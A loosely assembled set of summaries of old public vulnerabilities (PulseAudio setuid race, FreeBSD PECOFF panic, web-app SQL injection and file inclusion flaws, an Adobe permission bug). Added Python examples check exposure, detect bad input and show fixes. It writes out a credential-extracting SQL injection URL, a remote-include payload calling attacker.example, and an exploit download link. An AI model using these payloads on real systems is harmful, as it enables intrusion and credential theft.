PulseAudio setuid local privilege escalation is a vulnerability discovered by Tavis Ormandy, Julien Tinnes and Yorick Koster. It lets a local attacker gain root through PulseAudio's setuid-root binary. The exploit was tested successfully on Ubuntu 9.04 (x86-64) and Slackware 12.2.0 (x86) and is available for download at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz).
The underlying bug is a race condition. When started setuid root, PulseAudio re-executes itself through /proc/self/exe (after setting LD_BIND_NOW=1), and that symlink resolves to whatever path the binary was started from, including a hard link the attacker created in a directory they control. The exploit hard-links the setuid binary into such a directory, forks a child that executes the link, and races to replace the link with a malicious program (a shell script in the published exploit) before the re-exec happens. If the swap wins, the already-privileged process executes the attacker's program as root. Two preconditions worth checking on a system: the attacker-writable directory must be on the same filesystem as the binary (hard links cannot cross filesystems), and the fs.protected_hardlinks sysctl on Linux 3.6 and later (set to 1) refuses hard links to files the user does not own, which blocks this technique against a root-owned binary.
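The following is an added example, not part of the original exploit or of PulseAudio, that checks the preconditions of the hard-link race described above against an arbitrary setuid binary: the setuid bit, a writable directory on the same filesystem, and the protected_hardlinks sysctl. The demo layout it builds (a fake "pulseaudio" file and an "attacker" directory under a temporary directory) is constructed for illustration.

```python
import os
import stat
import tempfile


def read_protected_hardlinks():
    """Return fs.protected_hardlinks (Linux 3.6+), or None when the sysctl is
    not available (non-Linux host or a kernel without the knob)."""
    try:
        with open("/proc/sys/fs/protected_hardlinks") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def hardlink_race_exposure(binary, candidate_dirs):
    """Report the preconditions for a hard-link race against a setuid binary.

    The attack needs (a) the setuid bit on the target, (b) a directory the
    attacker can write to on the *same* filesystem, because link(2) cannot
    cross filesystems, and (c) a kernel that allows links to files the
    attacker does not own (protected_hardlinks != 1). An unknown sysctl value
    is treated as "not protected".
    """
    st = os.stat(binary)
    is_setuid = bool(st.st_mode & stat.S_ISUID)
    linkable = []
    for d in candidate_dirs:
        try:
            dst = os.stat(d)
        except OSError:
            continue  # missing or unreadable directory: not usable by the attacker
        if dst.st_dev == st.st_dev and os.access(d, os.W_OK):
            linkable.append(d)
    protected = read_protected_hardlinks()
    return {
        "setuid": is_setuid,
        "owner_uid": st.st_uid,
        "nlink": st.st_nlink,              # >1 means another link already exists
        "linkable_dirs": linkable,
        "protected_hardlinks": protected,  # 1 blocks links to files you do not own
        "exposed": is_setuid and bool(linkable) and protected != 1,
    }


def demo_in_tempdir():
    """Constructed layout: a fake 'pulseaudio' file plus an attacker-writable
    sibling directory on the same filesystem. Returns the report before and
    after the setuid bit is set on the fake binary."""
    root = tempfile.mkdtemp(prefix="setuid-race-")
    target = os.path.join(root, "pulseaudio")
    with open(target, "wb") as f:
        f.write(b"placeholder, constructed for the demo\n")
    attacker_dir = os.path.join(root, "attacker")
    os.mkdir(attacker_dir)
    before = hardlink_race_exposure(target, [attacker_dir, os.path.join(root, "missing")])
    os.chmod(target, 0o4755)  # the owner may set the setuid bit on its own file
    after = hardlink_race_exposure(target, [attacker_dir])
    return before, after


if __name__ == "__main__":
    # Real check: adjust the binary path to where pulseaudio is installed.
    for path in ("/usr/bin/pulseaudio", "/usr/local/bin/pulseaudio"):
        if os.path.exists(path):
            print(path, hardlink_race_exposure(path, ["/tmp", "/var/tmp", os.path.expanduser("~")]))
    before, after = demo_in_tempdir()
    print("demo before:", before)
    print("demo after: ", after)
```

On an affected 2009-era system the real check reports setuid=True, /tmp in linkable_dirs and protected_hardlinks=None (the sysctl did not exist yet), which is exactly the exposed combination; on a current distribution PulseAudio is no longer setuid and protected_hardlinks defaults to 1.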
The exploit panics the FreeBSD kernel through a bug in the PECOFF executable loader (enabled with 'options PECOFF_SUPPORT' in the kernel config or with `kldload pecoff`). The panic appears to originate in generic_bcopy as a page fault, which may be exploitable, but at the moment the exploit is only a denial of service.
MCshoutbox 1.1 is vulnerable to SQL injection login bypass, cross-site scripting and shell upload. An attacker can use these to bypass authentication, run script in other users' browsers and upload arbitrary files to the server.
MiniCWB version 2.3.0 contains multiple remote file inclusion vulnerabilities. The 'LANG' parameter of the vulnerable file is used as an include path without validation, so an attacker who supplies a URL in that parameter gets remote PHP code fetched and executed on the server (provided PHP permits URL includes; allow_url_include is off by default since PHP 5.2).
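Added example, not MiniCWB's code: the include-path pattern behind this class of bug next to a validating version. The file names, the "lang/" layout and the allowlist are hypothetical; the trailing "?" in the remote payload is the standard trick that turns whatever the application appends into a query string so the attacker's file is what gets fetched.

```python
from urllib.parse import urlsplit

# Constructed allowlist of language packs the application actually ships.
AVAILABLE_LANGS = ("en", "de", "fr")


def unsafe_include_target(lang):
    """The vulnerable pattern: the LANG parameter is the *start* of the include
    path and is concatenated unchecked, so a URL passes straight through."""
    return lang + "/strings.php"


def fetched_remote_host(include_path):
    """What a URL-include-enabled PHP would do with the path: if it parses as a
    URL with a scheme, the host that would be contacted; otherwise None."""
    parts = urlsplit(include_path)
    if parts.scheme and parts.netloc:
        return parts.netloc
    return None


def classify_lang(lang):
    """Classify a LANG value for logging/detection purposes."""
    if urlsplit(lang).scheme:              # http://, ftp://, php://, data: ...
        return "remote"
    if "\x00" in lang:                     # null byte used to cut off a suffix
        return "null-byte"
    if "/" in lang or "\\" in lang or ".." in lang:
        return "traversal"
    if lang not in AVAILABLE_LANGS:
        return "unknown"
    return "ok"


def safe_include_target(lang):
    """Only an exact allowlisted token reaches the include; everything else,
    including URLs, traversal and unknown names, is rejected."""
    if classify_lang(lang) != "ok":
        return None
    return "lang/" + lang + "/strings.php"


if __name__ == "__main__":
    for value in ("en", "http://attacker.example/shell.txt?", "../../../../etc/passwd",
                  "zz"):
        print(repr(value), classify_lang(value), "->", safe_include_target(value))
    remote = unsafe_include_target("http://attacker.example/shell.txt?")
    print("vulnerable path:", remote, "contacts", fetched_remote_host(remote))
```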
A vulnerability in Netrix CMS 1.0 allows an attacker to bypass authentication and reach the administrative panel by sending a crafted HTTP request to cikkform.php with the parameter cid set to 1. From there the attacker can edit any content or replace the site's index page with their own.
Silentum Guestbook v2.0.2 is vulnerable to SQL injection in the 'messageid' parameter of silentum_guestbook.php. The value is placed unescaped into the query, so an attacker can append a UNION that reads other tables, for example the admin username, password and e-mail from silentum_admin: 'silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/'. The seven selected columns must match the column count of the original query, and 0x3a is the ':' separator between the three fields.
EpicVJ 1.2.8.0 has a local heap overflow that is triggered when a specially crafted .mpl or .m3u playlist file is opened. This can lead to arbitrary code execution.
The Adobe downloader, used to fetch updates for Adobe applications and shipped with Acrobat Reader 9.x, is installed with improper permissions: its executable grants Full Control to BUILTIN\Users, so any local user can replace it with a binary of their choice, and at the next reboot that binary runs with SYSTEM privileges.
RadNICS Gold v5 is vulnerable to SQL injection in the "fid" parameter of the "view_forum" module. The parameter value is used unsanitised in a query, so an attacker can inject arbitrary SQL through it and read from or modify the database.
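Added example covering both the Silentum Guestbook 'messageid' injection and the RadNICS Gold 'fid' injection, which share the same root cause (an integer parameter concatenated into a query). It is not code from either product: the tables are constructed in an in-memory SQLite database, and the payload is the Silentum one adapted to SQLite syntax (`||` and ':' in place of MySQL's concat() and 0x3a, and without the trailing comment). The message-table columns are hypothetical; silentum_admin and its u_name, u_password and u_email columns come from the published payload.

```python
import sqlite3

# The Silentum payload from the advisory, in SQLite dialect. Seven columns are
# selected because the hypothetical message query below returns seven.
PAYLOAD = ("-1 UNION ALL SELECT 0,0,0,0,"
           "u_name||':'||u_password||':'||u_email,0,0 FROM silentum_admin")

MESSAGE_QUERY = ("SELECT messageid, name, email, website, message, ip, posted "
                 "FROM messages WHERE messageid=")


def build_sample_db():
    """Constructed schema and rows standing in for the guestbook database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE silentum_admin (u_name TEXT, u_password TEXT, u_email TEXT);
        INSERT INTO silentum_admin VALUES
            ('admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.com');
        CREATE TABLE messages (messageid INTEGER, name TEXT, email TEXT,
                               website TEXT, message TEXT, ip TEXT, posted TEXT);
        INSERT INTO messages VALUES
            (1, 'alice', 'alice@example.com', '', 'hello', '127.0.0.1', '2009-01-01');
    """)
    return conn


def vulnerable_lookup(conn, messageid):
    """The vulnerable pattern: the request parameter is glued into the SQL text,
    so '-1 UNION ALL SELECT ...' becomes part of the statement."""
    return conn.execute(MESSAGE_QUERY + messageid).fetchall()


def safe_lookup(conn, messageid):
    """Hardened version: the id must be an integer and is bound as a parameter,
    so the payload can never change the statement's structure."""
    try:
        mid = int(messageid)
    except (TypeError, ValueError):
        return []
    return conn.execute(MESSAGE_QUERY + "?", (mid,)).fetchall()


def extracted_admin_record(conn):
    """Run the injection and return the admin record it leaks (5th column of the
    UNIONed row, where the original query's 'message' column is displayed)."""
    rows = vulnerable_lookup(conn, PAYLOAD)
    return rows[0][4] if rows else None


if __name__ == "__main__":
    db = build_sample_db()
    print("legitimate request:", vulnerable_lookup(db, "1"))
    print("injected request:  ", vulnerable_lookup(db, PAYLOAD))
    print("leaked admin record:", extracted_admin_record(db))
    print("hardened, injected:", safe_lookup(db, PAYLOAD))
    print("hardened, legitimate:", safe_lookup(db, "1"))
```

The same test applies to the RadNICS 'fid' parameter: if view_forum renders one of its selected columns back to the page, a UNION with the right column count turns that column into a read channel for any table; the fix in both cases is the integer check plus parameter binding in safe_lookup.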